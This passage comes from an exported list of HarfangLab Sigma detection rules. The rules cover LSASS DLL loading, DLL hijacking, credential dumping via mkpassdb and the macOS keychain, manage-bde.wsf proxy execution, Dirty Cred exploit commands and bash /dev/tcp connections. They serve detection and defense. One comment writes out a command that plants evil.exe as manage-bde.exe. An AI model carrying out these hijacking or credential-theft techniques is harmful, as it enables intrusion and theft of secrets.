'?:\\SnapVolumesTemp\\MountPoints\\{????????-????-????-????-????????????}\\{????????-????-????-????-????????????}\\SVROOT\\Windows\\System32\\'\n\n exclusion_microsoft:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n exclusion_docker:\n ImageLoaded|startswith:\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\Syswow64\\'\n - '*\\docker\\data\\windowsfilter\\\\*\\Files\\Windows\\System32\\'\n - '*\\docker\\data\\windowsfilter\\\\*\\Files\\Windows\\Syswow64\\'\n\n exclusion_sandboxed:\n ImageLoaded|startswith: '\\Device\\vmsmb\\'\n\n exclusion_device_harddiskvolume:\n ImageLoaded|startswith: '\\Device\\HarddiskVolume'\n\n exclusion_nationalinstruments:\n ImageLoaded: '*\\National Instruments\\Shared\\mDNS Responder\\nimdnsNSP.dll'\n\n exclusion_ibmnerworkprovider:\n ImageLoaded|endswith: '\\IBM\\Client Access\\Shared\\cwbnetnt.dll'\n Description: 'Client Access Express Network Provider'\n OriginalFileName: 'cwbnetnt.dll'\n\n exclusion_primx:\n Signed: 'true'\n Signature: \"PRIM'X TECHNOLOGIES S.A.S.\"\n\n exclusion_quest:\n Signed: 'true'\n Signature:\n - 'QUEST SOFTWARE INC.'\n - 'QUEST SOFTWARE, INC.'\n ImageLoaded: '?:\\Windows\\BTPass\\x64\\BTPassAsm.dll'\n\n exclusion_trendmicro:\n ImageLoaded: '?:\\WINAPP64\\AVSWM\\Trend Micro\\Deep Security*\\TMExtractor64.dll'\n Signed: 'true'\n Signature: 'Trend Micro, Inc.'\n\n exclusion_mcafee:\n ImageLoaded|endswith:\n - '\\McAfee\\Endpoint Security\\Threat Prevention\\IPS\\EpMPApi.dll'\n - '\\McAfee\\Endpoint Security\\Threat Prevention\\IPS\\EpMPThe.dll'\n Signed: 'true'\n Signature:\n - 'McAfee, Inc.'\n - 'Musarubra US LLC'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8c69841b-27a7-42ba-a3ca-190318752de4",
"rule_name": "DLL Loaded by LSASS from Unusual Location",
"rule_description": "Detects when a DLL is loaded by LSASS.exe from an unusual location.\nThe LSASS process is responsible for authentications in Windows.\nAttackers can inject code into the LSASS process as an attempt to read credentials from its memory.\nIt is recommended to analyze the loaded DLL as well as to look for signs of credential dumping on the system.\n",
"rule_creation_date": "2023-03-28",
"rule_modified_date": "2026-02-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1055.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8c74f503-c13c-4aac-bec6-dce34f0e3ae4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090805Z",
"creation_date": "2026-03-23T11:45:34.090807Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090811Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_presentationhost.yml",
"content": "title: DLL Hijacking via presentationhost.exe\nid: 8c74f503-c13c-4aac-bec6-dce34f0e3ae4\ndescription: |\n Detects potential Windows DLL Hijacking via presentationhost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'presentationhost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.DLL'\n - '\\mscoree.dll'\n - '\\urlmon.dll'\n - '\\version.dll'\n - '\\WININET.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8c74f503-c13c-4aac-bec6-dce34f0e3ae4",
"rule_name": "DLL Hijacking via presentationhost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via presentationhost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8c815a1b-f4b0-4ebd-abec-692d10353642",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617095Z",
"creation_date": "2026-03-23T11:45:34.617098Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617106Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1555/005/"
],
"name": "t1564_001_creds_dump_mkpassdb.yml",
"content": "title: Credentials Dumped via mkpassdb\nid: 8c815a1b-f4b0-4ebd-abec-692d10353642\ndescription: |\n Detects the usage of mkpassdb to dump credentials.\n Adversaries may dump credentials to use them for lateral movement.\n It is recommended to check for other suspicious activities by the parent process.\nreferences:\n - https://attack.mitre.org/techniques/T1555/005/\ndate: 2024/07/22\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.005\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n ProcessName: 'mkpassdb'\n CommandLine|contains: '-dump'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8c815a1b-f4b0-4ebd-abec-692d10353642",
"rule_name": "Credentials Dumped via mkpassdb",
"rule_description": "Detects the usage of mkpassdb to dump credentials.\nAdversaries may dump credentials to use them for lateral movement.\nIt is recommended to check for other suspicious activities by the parent process.\n",
"rule_creation_date": "2024-07-22",
"rule_modified_date": "2025-03-07",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8c870c23-e2f8-4774-86d6-12106f4109c9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074945Z",
"creation_date": "2026-03-23T11:45:34.074947Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074951Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/",
"https://attack.mitre.org/techniques/T1216/"
],
"name": "t1216_manage_bde_wsf_post_exec.yml",
"content": "title: Binary Hijacked via manage-bde.wsf\nid: 8c870c23-e2f8-4774-86d6-12106f4109c9\ndescription: |\n Detects the execution of the manage-bde.wsf script to execute a fake manage-bde.exe.\n When the manage-bde.wsf script is run, it will try to execute manage-bde.exe by first looking in the current directory.\n Attackers may put a malicious manage-bde.exe in any directory they have write access to, and execute the manage-bde.wsf to proxy the execution of their payload.\n The manage-bde.wsf script, used to manage BitLocker, has been deprecated since Windows 7 and manage-bde.exe should be used instead.\n It is recommended to investigate the process that ran the cscript.exe process, as well as the manage-bde.exe process.\nreferences:\n - https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/\n - https://attack.mitre.org/techniques/T1216/\ndate: 2022/01/27\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Manage-bde\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # copy c:\\users\\person\\evil.exe c:\\users\\public\\manage-bde.exe & cd c:\\users\\public\\ & cscript.exe c:\\windows\\system32\\manage-bde.wsf\n selection:\n GrandparentImage|endswith: '\\cscript.exe'\n GrandparentCommandLine|contains: 'manage-bde.wsf'\n ParentImage|contains: 'cmd.exe'\n Image|endswith: '\\manage-bde.exe'\n CommandLine|contains: '-legacy_Vista'\n\n filter_legitimate_manage_bde:\n Image: '?:\\Windows\\System32\\manage-bde.exe'\n\n condition: selection and not 1 of filter_*\nlevel: critical\n#level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8c870c23-e2f8-4774-86d6-12106f4109c9",
"rule_name": "Binary Hijacked via manage-bde.wsf",
"rule_description": "Detects the execution of the manage-bde.wsf script to execute a fake manage-bde.exe.\nWhen the manage-bde.wsf script is run, it will try to execute manage-bde.exe by first looking in the current directory.\nAttackers may put a malicious manage-bde.exe in any directory they have write access to, and execute the manage-bde.wsf to proxy the execution of their payload.\nThe manage-bde.wsf script, used to manage BitLocker, has been deprecated since Windows 7 and manage-bde.exe should be used instead.\nIt is recommended to investigate the process that ran the cscript.exe process, as well as the manage-bde.exe process.\n",
"rule_creation_date": "2022-01-27",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1216"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8c9d264e-3309-4fe1-98a9-2fc7bb414f7b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608351Z",
"creation_date": "2026-03-23T11:45:34.608354Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608362Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1555/001/"
],
"name": "t1555_001_login_keychain_access.yml",
"content": "title: Access to macOS Login Keychain\nid: 8c9d264e-3309-4fe1-98a9-2fc7bb414f7b\ndescription: |\n Detects an access to the macOS Login Keychain.\n Keychain (or Keychain Services) is the macOS credential management system.\n Attackers may access the macOS Login Keychain to gather user credentials or the location of its database.\n It is recommended to ensure that the process accessing this file is legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1555/001/\ndate: 2022/11/18\nmodified: 2024/03/12\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n # security login-keychain\n Image: '/usr/bin/security'\n CommandLine|contains: ' login-keychain'\n\n exclusion_duo_desktop:\n ParentImage: '/Applications/Duo Desktop.app/Contents/MacOS/Duo Desktop'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8c9d264e-3309-4fe1-98a9-2fc7bb414f7b",
"rule_name": "Access to macOS Login Keychain",
"rule_description": "Detects an access to the macOS Login Keychain.\nKeychain (or Keychain Services) is the macOS credential management system.\nAttackers may access the macOS Login Keychain to gather user credentials or the location of its database.\nIt is recommended to ensure that the process accessing this file is legitimate.\n",
"rule_creation_date": "2022-11-18",
"rule_modified_date": "2024-03-12",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8c9d9dc3-9906-4f86-b62d-fbf0e6898430",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619470Z",
"creation_date": "2026-03-23T11:45:34.619472Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619477Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://access.redhat.com/security/cve/cve-2022-2588",
"https://github.com/Markakd/CVE-2022-2588",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_dirty_cred_poc.yml",
"content": "title: Possible Exploitation of Dirty Cred\nid: 8c9d9dc3-9906-4f86-b62d-fbf0e6898430\ndescription: |\n Detects common exploits and proof-of-concepts for the Linux Dirty Cred vulnerability (CVE-2022-2588).\n This vulnerability resides in the network packet scheduler implementation in the Linux kernel which does not properly remove all references to a route filter before freeing it in some situations.\n A local attacker can exploit this to cause a denial of service (system crash) or execute arbitrary code.\n It is recommended to determine if this action comes from internal tests and if not, to launch an investigation into the breach.\nreferences:\n - https://access.redhat.com/security/cve/cve-2022-2588\n - https://github.com/Markakd/CVE-2022-2588\n - https://attack.mitre.org/techniques/T1068/\ndate: 2022/10/07\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - cve.2022-2588\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Exploit.CVE-2022-2588\n - classification.Linux.Exploit.DirtyCred\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_cmd1:\n CommandLine|endswith: 'rm -rf exp_dir; mkdir exp_dir; touch exp_dir/data'\n\n selection_cmd2:\n ParentCommandLine|endswith: 'rm -rf exp_dir; mkdir exp_dir; touch exp_dir/data'\n CommandLine:\n - 'rm -rf exp_dir'\n - 'mkdir exp_dir'\n - 'touch exp_dir/data'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8c9d9dc3-9906-4f86-b62d-fbf0e6898430",
"rule_name": "Possible Exploitation of Dirty Cred",
"rule_description": "Detects common exploits and proof-of-concepts for the Linux Dirty Cred vulnerability (CVE-2022-2588).\nThis vulnerability resides in the network packet scheduler implementation in the Linux kernel which does not properly remove all references to a route filter before freeing it in some situations.\nA local attacker can exploit this to cause a denial of service (system crash) or execute arbitrary code.\nIt is recommended to determine if this action comes from internal tests and if not, to launch an investigation into the breach.\n",
"rule_creation_date": "2022-10-07",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8ca3659e-81fe-487c-9ecf-80da110acec4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T10:57:06.360476Z",
"creation_date": "2026-03-23T11:45:35.295688Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295695Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md#atomic-test-1---port-scan",
"https://acc3ssp0int.com/2023/10/15/back-2-basics-dev-tcp/",
"https://attack.mitre.org/techniques/T1046/",
"https://attack.mitre.org/techniques/T1049/"
],
"name": "t1046_scan_ports_bash.yml",
"content": "title: Suspicious TCP Connection from Shell\nid: 8ca3659e-81fe-487c-9ecf-80da110acec4\ndescription: |\n Detects a suspicious TCP connection from a Linux shell command.\n Adversaries can open TCP connections from a shell to scan for open ports and list the services running on a remote host or local network infrastructure devices, including those that may be vulnerable to remote software exploitation.\n It is recommended to investigate the context of this action to determine its legitimacy.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md#atomic-test-1---port-scan\n - https://acc3ssp0int.com/2023/10/15/back-2-basics-dev-tcp/\n - https://attack.mitre.org/techniques/T1046/\n - https://attack.mitre.org/techniques/T1049/\ndate: 2022/12/28\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1046\n - attack.t1049\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Bash\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains: 'echo*>*/dev/tcp/'\n ParentImage|contains: '?'\n\n exclusion_localhost:\n CommandLine|contains:\n - '/dev/tcp/127.0.0.1'\n - '/dev/tcp/localhost'\n\n exclusion_rfc1918:\n CommandLine|contains:\n - '/dev/tcp/192.168.'\n - '/dev/tcp/10.'\n - '/dev/tcp/172.16.'\n\n exclusion_commandline:\n CommandLine|contains:\n - '/dev/tcp/$HOST/$PORT'\n - '/dev/tcp/${host}/${port}'\n\n exclusion_teleport:\n CommandLine|contains|all:\n - 'bash -c #!/bin/bash'\n - 'set -euo pipefail'\n - 'SCRIPT_NAME=\"teleport-installer\"'\n - '# default values'\n - 'ALIVE_CHECK_DELAY='\n\n exclusion_containerd:\n - ProcessParentImage: '/usr/bin/containerd-shim-runc-v2'\n - ProcessAncestors|contains: '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_podman:\n - ProcessImage: '/usr/bin/podman'\n - ProcessParentImage: '/usr/bin/podman'\n - ProcessAncestors|contains: 
'|/usr/bin/podman|'\n\n exclusion_bladelogic:\n - ProcessImage: '/opt/bladelogic/*/bin/rscd_full'\n - ProcessParentImage: '/opt/bladelogic/*/bin/rscd_full'\n - ProcessAncestors|contains: '|/opt/bladelogic/*/bin/rscd_full|'\n\n exclusion_ngmagent:\n - ProcessCommandLine|contains: '/opt/*/NGMAgent/AgentManager/agents/'\n - ProcessParentCommandLine|contains: '/opt/*/NGMAgent/AgentManager/agents/'\n - ProcessGrandparentCommandLine|contains: '/opt/*/NGMAgent/AgentManager/agents/'\n\n exclusion_aptplaton:\n ProcessParentCommandLine|contains: '/bin/aptplaton-register'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n\n exclusion_template_cron:\n - ParentImage:\n - '/usr/sbin/cron'\n - '/usr/sbin/crond'\n - Ancestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n\n exclusion_syslog:\n CommandLine|contains:\n - 'echo \"<13>*>*/dev/tcp/*/514'\n - 'echo \"<14>*>*/dev/tcp/*/514'\n - 'echo \\\\\"<13>*>*/dev/tcp/*/514'\n - 'echo \\\\\"<14>*>*/dev/tcp/*/514'\n\n exclusion_oneautomation:\n ProcessAncestors|contains: '|/opt/oneautomation/*/smgr/bin/ucybsmgr|'\n\n # Avoid multiple detections when the command-line is executed via timeout\n exclusion_timeout:\n - ProcessImage: '/usr/bin/timeout'\n - ProcessCommandLine|contains: 'timeout '\n ProcessParentImage: '/usr/lib/openssh/sshd-session'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8ca3659e-81fe-487c-9ecf-80da110acec4",
"rule_name": "Suspicious TCP Connection from Shell",
"rule_description": "Detects a suspicious TCP connection from a Linux shell command.\nAdversaries can open TCP connections from a shell to scan for open ports and list the services running on a remote host or local network infrastructure devices, including those that may be vulnerable to remote software exploitation.\nIt is recommended to investigate the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2022-12-28",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1046",
"attack.t1049"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8cb69029-47d1-4f24-8749-1271be96e42c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075779Z",
"creation_date": "2026-03-23T11:45:34.075781Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075786Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_computerdefaults.yml",
"content": "title: DLL Hijacking via computerdefaults.exe\nid: 8cb69029-47d1-4f24-8749-1271be96e42c\ndescription: |\n Detects potential Windows DLL Hijacking via computerdefaults.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'computerdefaults.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.DLL'\n - '\\edputil.dll'\n - '\\MLANG.dll'\n - '\\PROPSYS.dll'\n - '\\Secur32.dll'\n - '\\SSPICLI.DLL'\n - '\\WININET.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - 